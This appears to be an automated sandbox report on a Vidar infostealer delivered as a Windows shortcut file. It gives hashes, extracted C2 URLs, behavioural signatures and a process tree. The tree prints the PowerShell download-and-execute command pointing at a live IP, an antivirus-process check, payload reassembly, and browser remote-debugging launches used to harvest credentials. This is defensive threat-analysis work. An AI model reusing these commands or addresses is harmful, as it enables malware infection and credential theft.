Analysis
-
max time kernel
144s -
max time network
139s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
05-11-2024 03:55
Static task
static1
Behavioral task
behavioral1
Sample
8aaed2aa282a84b5ae31cc397c4602e2ec5b376370a19f3e8884d5333d699e34.lnk
Resource
win7-20240903-en
General
-
Target
8aaed2aa282a84b5ae31cc397c4602e2ec5b376370a19f3e8884d5333d699e34.lnk
-
Size
2KB
-
MD5
55954104c8a8dc66a41548f4eed8eeeb
-
SHA1
16ccdc346e47c1a35f6bfb6ef2af307a17bdada2
-
SHA256
8aaed2aa282a84b5ae31cc397c4602e2ec5b376370a19f3e8884d5333d699e34
-
SHA512
c00917341d30c02f918ec0349903fbc4a91af3183240403b9e032730a6ad03b24c068f1a401c978fd426dc2a28f07aaab910e95b0e89b6abed9af25a17187b42
Malware Config
Extracted
vidar
https://t.me/asg7rd
https://steamcommunity.com/profiles/76561199794498376
-
user_agent
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Safari/605.1.15 Ddg/17.6
Signatures
-
Detect Vidar Stealer 17 IoCs
resource yara_rule behavioral2/memory/4832-418-0x00000000049D0000-0x0000000004CD0000-memory.dmp family_vidar_v7 behavioral2/memory/4832-419-0x00000000049D0000-0x0000000004CD0000-memory.dmp family_vidar_v7 behavioral2/memory/4832-420-0x00000000049D0000-0x0000000004CD0000-memory.dmp family_vidar_v7 behavioral2/memory/4832-438-0x00000000049D0000-0x0000000004CD0000-memory.dmp family_vidar_v7 behavioral2/memory/4832-439-0x00000000049D0000-0x0000000004CD0000-memory.dmp family_vidar_v7 behavioral2/memory/4832-876-0x00000000049D0000-0x0000000004CD0000-memory.dmp family_vidar_v7 behavioral2/memory/4832-877-0x00000000049D0000-0x0000000004CD0000-memory.dmp family_vidar_v7 behavioral2/memory/4832-883-0x00000000049D0000-0x0000000004CD0000-memory.dmp family_vidar_v7 behavioral2/memory/4832-884-0x00000000049D0000-0x0000000004CD0000-memory.dmp family_vidar_v7 behavioral2/memory/4832-1071-0x00000000049D0000-0x0000000004CD0000-memory.dmp family_vidar_v7 behavioral2/memory/4832-1245-0x00000000049D0000-0x0000000004CD0000-memory.dmp family_vidar_v7 behavioral2/memory/4832-1251-0x00000000049D0000-0x0000000004CD0000-memory.dmp family_vidar_v7 behavioral2/memory/4832-1260-0x00000000049D0000-0x0000000004CD0000-memory.dmp family_vidar_v7 behavioral2/memory/4832-1280-0x00000000049D0000-0x0000000004CD0000-memory.dmp family_vidar_v7 behavioral2/memory/4832-1281-0x00000000049D0000-0x0000000004CD0000-memory.dmp family_vidar_v7 behavioral2/memory/4832-1288-0x00000000049D0000-0x0000000004CD0000-memory.dmp family_vidar_v7 behavioral2/memory/4832-1289-0x00000000049D0000-0x0000000004CD0000-memory.dmp family_vidar_v7 -
Vidar family
-
Blocklisted process makes network request 1 IoCs
flow pid Process 6 3344 powershell.exe -
pid Process 3344 powershell.exe -
Downloads MZ/PE file
-
Uses browser remote debugging 2 TTPs 10 IoCs
Can be used control the browser and steal sensitive information such as credentials and session cookies.
pid Process 4744 msedge.exe 2644 chrome.exe 440 chrome.exe 412 chrome.exe 1168 chrome.exe 3424 msedge.exe 2872 msedge.exe 2244 msedge.exe 2164 msedge.exe 1312 chrome.exe -
Checks computer location settings 2 TTPs 3 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Control Panel\International\Geo\Nation Alternatives.pif Key value queried \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Control Panel\International\Geo\Nation cmd.exe Key value queried \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Control Panel\International\Geo\Nation smartscreen.exe -
Executes dropped EXE 2 IoCs
pid Process 3468 smartscreen.exe 4832 Alternatives.pif -
Loads dropped DLL 3 IoCs
pid Process 4832 Alternatives.pif 4832 Alternatives.pif 4832 Alternatives.pif -
Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files associated with programs like FileZilla.
-
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Enumerates processes with tasklist 1 TTPs 2 IoCs
pid Process 2196 tasklist.exe 736 tasklist.exe -
Drops file in Windows directory 14 IoCs
description ioc Process File opened for modification C:\Windows\NetherlandsRendered smartscreen.exe File opened for modification C:\Windows\CumulativeMaximize smartscreen.exe File opened for modification C:\Windows\AdministratorsDerby smartscreen.exe File opened for modification C:\Windows\DecemberPowell smartscreen.exe File opened for modification C:\Windows\ExceptCancellation smartscreen.exe File opened for modification C:\Windows\WestPython smartscreen.exe File opened for modification C:\Windows\FrequentAluminum smartscreen.exe File opened for modification C:\Windows\MemberIrish smartscreen.exe File opened for modification C:\Windows\BmMary smartscreen.exe File opened for modification C:\Windows\HarassmentWrong smartscreen.exe File opened for modification C:\Windows\CoachingAmy smartscreen.exe File opened for modification C:\Windows\IaBacked smartscreen.exe File opened for modification C:\Windows\ContextDeleted smartscreen.exe File opened for modification C:\Windows\RailwayDistricts smartscreen.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 13 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language findstr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language findstr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language findstr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language choice.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language timeout.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language smartscreen.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language tasklist.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language tasklist.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Alternatives.pif Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe -
Checks processor information in registry 2 TTPs 5 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 Alternatives.pif Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString Alternatives.pif Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString msedge.exe -
Delays execution with timeout.exe 1 IoCs
pid Process 2984 timeout.exe -
Enumerates system info in registry 2 TTPs 8 IoCs
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer chrome.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU msedge.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe -
Modifies data under HKEY_USERS 2 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry chrome.exe Set value (int) \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133752525678932684" chrome.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 3344 powershell.exe 3344 powershell.exe 4832 Alternatives.pif 4832 Alternatives.pif 4832 Alternatives.pif 4832 Alternatives.pif 4832 Alternatives.pif 4832 Alternatives.pif 4832 Alternatives.pif 4832 Alternatives.pif 4832 Alternatives.pif 4832 Alternatives.pif 4832 Alternatives.pif 4832 Alternatives.pif 4832 Alternatives.pif 4832 Alternatives.pif 4832 Alternatives.pif 4832 Alternatives.pif 4832 Alternatives.pif 4832 Alternatives.pif 4832 Alternatives.pif 4832 Alternatives.pif 4832 Alternatives.pif 4832 Alternatives.pif 4832 Alternatives.pif 4832 Alternatives.pif 4832 Alternatives.pif 4832 Alternatives.pif 4832 Alternatives.pif 4832 Alternatives.pif 4832 Alternatives.pif 4832 Alternatives.pif 4832 Alternatives.pif 4832 Alternatives.pif 4832 Alternatives.pif 4832 Alternatives.pif 4832 Alternatives.pif 4832 Alternatives.pif 4832 Alternatives.pif 4832 Alternatives.pif 4832 Alternatives.pif 4832 Alternatives.pif 4832 Alternatives.pif 4832 Alternatives.pif 4832 Alternatives.pif 4832 Alternatives.pif 4832 Alternatives.pif 4832 Alternatives.pif 4832 Alternatives.pif 4832 Alternatives.pif 4832 Alternatives.pif 4832 Alternatives.pif 4832 Alternatives.pif 4832 Alternatives.pif 4832 Alternatives.pif 4832 Alternatives.pif 4832 Alternatives.pif 4832 Alternatives.pif 4832 Alternatives.pif 4832 Alternatives.pif 2644 chrome.exe 2644 chrome.exe 4832 Alternatives.pif 4832 Alternatives.pif -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 8 IoCs
pid Process 2644 chrome.exe 2644 chrome.exe 2644 chrome.exe 2644 chrome.exe 3424 msedge.exe 3424 msedge.exe 3424 msedge.exe 3424 msedge.exe -
Suspicious use of AdjustPrivilegeToken 21 IoCs
description pid Process Token: SeDebugPrivilege 3344 powershell.exe Token: SeDebugPrivilege 736 tasklist.exe Token: SeDebugPrivilege 2196 tasklist.exe Token: SeShutdownPrivilege 2644 chrome.exe Token: SeCreatePagefilePrivilege 2644 chrome.exe Token: SeShutdownPrivilege 2644 chrome.exe Token: SeCreatePagefilePrivilege 2644 chrome.exe Token: SeShutdownPrivilege 2644 chrome.exe Token: SeCreatePagefilePrivilege 2644 chrome.exe Token: SeShutdownPrivilege 2644 chrome.exe Token: SeCreatePagefilePrivilege 2644 chrome.exe Token: SeShutdownPrivilege 2644 chrome.exe Token: SeCreatePagefilePrivilege 2644 chrome.exe Token: SeShutdownPrivilege 2644 chrome.exe Token: SeCreatePagefilePrivilege 2644 chrome.exe Token: SeShutdownPrivilege 2644 chrome.exe Token: SeCreatePagefilePrivilege 2644 chrome.exe Token: SeShutdownPrivilege 2644 chrome.exe Token: SeCreatePagefilePrivilege 2644 chrome.exe Token: SeShutdownPrivilege 2644 chrome.exe Token: SeCreatePagefilePrivilege 2644 chrome.exe -
Suspicious use of FindShellTrayWindow 54 IoCs
pid Process 4832 Alternatives.pif 4832 Alternatives.pif 4832 Alternatives.pif 2644 chrome.exe 2644 chrome.exe 2644 chrome.exe 2644 chrome.exe 2644 chrome.exe 2644 chrome.exe 2644 chrome.exe 2644 chrome.exe 2644 chrome.exe 2644 chrome.exe 2644 chrome.exe 2644 chrome.exe 2644 chrome.exe 2644 chrome.exe 2644 chrome.exe 2644 chrome.exe 2644 chrome.exe 2644 chrome.exe 2644 chrome.exe 2644 chrome.exe 2644 chrome.exe 2644 chrome.exe 2644 chrome.exe 2644 chrome.exe 2644 chrome.exe 2644 chrome.exe 3424 msedge.exe 3424 msedge.exe 3424 msedge.exe 3424 msedge.exe 3424 msedge.exe 3424 msedge.exe 3424 msedge.exe 3424 msedge.exe 3424 msedge.exe 3424 msedge.exe 3424 msedge.exe 3424 msedge.exe 3424 msedge.exe 3424 msedge.exe 3424 msedge.exe 3424 msedge.exe 3424 msedge.exe 3424 msedge.exe 3424 msedge.exe 3424 msedge.exe 3424 msedge.exe 3424 msedge.exe 3424 msedge.exe 3424 msedge.exe 3424 msedge.exe -
Suspicious use of SendNotifyMessage 3 IoCs
pid Process 4832 Alternatives.pif 4832 Alternatives.pif 4832 Alternatives.pif -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2104 wrote to memory of 3344 2104 cmd.exe 85 PID 2104 wrote to memory of 3344 2104 cmd.exe 85 PID 3344 wrote to memory of 3468 3344 powershell.exe 94 PID 3344 wrote to memory of 3468 3344 powershell.exe 94 PID 3344 wrote to memory of 3468 3344 powershell.exe 94 PID 3468 wrote to memory of 3176 3468 smartscreen.exe 95 PID 3468 wrote to memory of 3176 3468 smartscreen.exe 95 PID 3468 wrote to memory of 3176 3468 smartscreen.exe 95 PID 3176 wrote to memory of 736 3176 cmd.exe 98 PID 3176 wrote to memory of 736 3176 cmd.exe 98 PID 3176 wrote to memory of 736 3176 cmd.exe 98 PID 3176 wrote to memory of 2644 3176 cmd.exe 99 PID 3176 wrote to memory of 2644 3176 cmd.exe 99 PID 3176 wrote to memory of 2644 3176 cmd.exe 99 PID 3176 wrote to memory of 2196 3176 cmd.exe 100 PID 3176 wrote to memory of 2196 3176 cmd.exe 100 PID 3176 wrote to memory of 2196 3176 cmd.exe 100 PID 3176 wrote to memory of 2044 3176 cmd.exe 101 PID 3176 wrote to memory of 2044 3176 cmd.exe 101 PID 3176 wrote to memory of 2044 3176 cmd.exe 101 PID 3176 wrote to memory of 4056 3176 cmd.exe 102 PID 3176 wrote to memory of 4056 3176 cmd.exe 102 PID 3176 wrote to memory of 4056 3176 cmd.exe 102 PID 3176 wrote to memory of 2376 3176 cmd.exe 103 PID 3176 wrote to memory of 2376 3176 cmd.exe 103 PID 3176 wrote to memory of 2376 3176 cmd.exe 103 PID 3176 wrote to memory of 1724 3176 cmd.exe 104 PID 3176 wrote to memory of 1724 3176 cmd.exe 104 PID 3176 wrote to memory of 1724 3176 cmd.exe 104 PID 3176 wrote to memory of 4832 3176 cmd.exe 105 PID 3176 wrote to memory of 4832 3176 cmd.exe 105 PID 3176 wrote to memory of 4832 3176 cmd.exe 105 PID 3176 wrote to memory of 3608 3176 cmd.exe 106 PID 3176 wrote to memory of 3608 3176 cmd.exe 106 PID 3176 wrote to memory of 3608 3176 cmd.exe 106 PID 4832 wrote to memory of 2644 4832 Alternatives.pif 111 PID 4832 wrote to memory of 2644 4832 Alternatives.pif 111 PID 2644 wrote to memory of 2504 2644 chrome.exe 112 PID 2644 wrote to memory of 2504 2644 chrome.exe 112 PID 2644 wrote to memory of 4416 2644 chrome.exe 113 PID 2644 wrote to memory of 4416 2644 chrome.exe 113 PID 2644 wrote to memory of 4416 2644 chrome.exe 113 PID 2644 wrote to memory of 4416 2644 chrome.exe 113 PID 2644 wrote to memory of 4416 2644 chrome.exe 113 PID 2644 wrote to memory of 4416 2644 chrome.exe 113 PID 2644 wrote to memory of 4416 2644 chrome.exe 113 PID 2644 wrote to memory of 4416 2644 chrome.exe 113 PID 2644 wrote to memory of 4416 2644 chrome.exe 113 PID 2644 wrote to memory of 4416 2644 chrome.exe 113 PID 2644 wrote to memory of 4416 2644 chrome.exe 113 PID 2644 wrote to memory of 4416 2644 chrome.exe 113 PID 2644 wrote to memory of 4416 2644 chrome.exe 113 PID 2644 wrote to memory of 4416 2644 chrome.exe 113 PID 2644 wrote to memory of 4416 2644 chrome.exe 113 PID 2644 wrote to memory of 4416 2644 chrome.exe 113 PID 2644 wrote to memory of 4416 2644 chrome.exe 113 PID 2644 wrote to memory of 4416 2644 chrome.exe 113 PID 2644 wrote to memory of 4416 2644 chrome.exe 113 PID 2644 wrote to memory of 4416 2644 chrome.exe 113 PID 2644 wrote to memory of 4416 2644 chrome.exe 113 PID 2644 wrote to memory of 4416 2644 chrome.exe 113 PID 2644 wrote to memory of 4416 2644 chrome.exe 113 PID 2644 wrote to memory of 4416 2644 chrome.exe 113 PID 2644 wrote to memory of 4416 2644 chrome.exe 113
Processes
-
C:\Windows\system32\cmd.execmd /c C:\Users\Admin\AppData\Local\Temp\8aaed2aa282a84b5ae31cc397c4602e2ec5b376370a19f3e8884d5333d699e34.lnk1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:2104 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "Invoke-WebRequest -Uri "http://79.124.58.130:443/VisitorLevy.exe" -OutFile (Join-Path ([System.IO.Path]::GetTempPath()) "smartscreen.exe"); Start-Process -FilePath (Join-Path ([System.IO.Path]::GetTempPath()) "smartscreen.exe")"2⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3344 -
C:\Users\Admin\AppData\Local\Temp\smartscreen.exe"C:\Users\Admin\AppData\Local\Temp\smartscreen.exe"3⤵
- Checks computer location settings
- Executes dropped EXE
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3468 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c copy List List.bat & List.bat4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3176 -
C:\Windows\SysWOW64\tasklist.exetasklist5⤵
- Enumerates processes with tasklist
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:736
-
-
C:\Windows\SysWOW64\findstr.exefindstr /I "wrsa opssvc"5⤵
- System Location Discovery: System Language Discovery
PID:2644
-
-
C:\Windows\SysWOW64\tasklist.exetasklist5⤵
- Enumerates processes with tasklist
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:2196
-
-
C:\Windows\SysWOW64\findstr.exefindstr -I "avastui avgui bdservicehost nswscsvc sophoshealth"5⤵
- System Location Discovery: System Language Discovery
PID:2044
-
-
C:\Windows\SysWOW64\cmd.execmd /c md 66055⤵
- System Location Discovery: System Language Discovery
PID:4056
-
-
C:\Windows\SysWOW64\findstr.exefindstr /V "CEREMONYBRAZILEARNINGSPAPER" Phys5⤵
- System Location Discovery: System Language Discovery
PID:2376
-
-
C:\Windows\SysWOW64\cmd.execmd /c copy /b ..\Particle + ..\Watt + ..\Reel + ..\Colours + ..\Fires + ..\Walks + ..\Th + ..\B + ..\Telephone + ..\Commissioner + ..\Vc + ..\Optional + ..\Tigers + ..\Maldives + ..\Applicant + ..\Trinidad P5⤵
- System Location Discovery: System Language Discovery
PID:1724
-
-
C:\Users\Admin\AppData\Local\Temp\6605\Alternatives.pifAlternatives.pif P5⤵
- Checks computer location settings
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:4832 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"6⤵
- Uses browser remote debugging
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:2644 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ff95248cc40,0x7ff95248cc4c,0x7ff95248cc587⤵PID:2504
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1916,i,2469442243104628900,6022977876239032825,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=1912 /prefetch:27⤵PID:4416
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=2028,i,2469442243104628900,6022977876239032825,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2180 /prefetch:37⤵PID:712
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2280,i,2469442243104628900,6022977876239032825,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2472 /prefetch:87⤵PID:1612
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3180,i,2469442243104628900,6022977876239032825,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3204 /prefetch:17⤵
- Uses browser remote debugging
PID:1312
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3216,i,2469442243104628900,6022977876239032825,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3380 /prefetch:17⤵
- Uses browser remote debugging
PID:440
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4496,i,2469442243104628900,6022977876239032825,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4228 /prefetch:17⤵
- Uses browser remote debugging
PID:412
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4528,i,2469442243104628900,6022977876239032825,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4616 /prefetch:87⤵PID:3516
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4608,i,2469442243104628900,6022977876239032825,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4788 /prefetch:87⤵PID:668
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4404,i,2469442243104628900,6022977876239032825,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4856 /prefetch:87⤵PID:2512
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4884,i,2469442243104628900,6022977876239032825,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4876 /prefetch:87⤵PID:3500
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4872,i,2469442243104628900,6022977876239032825,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4196 /prefetch:87⤵PID:760
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4908,i,2469442243104628900,6022977876239032825,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4788 /prefetch:87⤵PID:3992
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4904,i,2469442243104628900,6022977876239032825,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4260 /prefetch:87⤵PID:868
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5048,i,2469442243104628900,6022977876239032825,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5136 /prefetch:87⤵PID:4196
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --extension-process --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --field-trial-handle=4648,i,2469442243104628900,6022977876239032825,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4836 /prefetch:27⤵
- Uses browser remote debugging
PID:1168
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"6⤵
- Uses browser remote debugging
- Enumerates system info in registry
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
PID:3424 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff9524946f8,0x7ff952494708,0x7ff9524947187⤵
- Checks processor information in registry
- Enumerates system info in registry
PID:3632
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2160,12055970876301043719,15487507281107843006,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2172 /prefetch:27⤵PID:2984
-
-
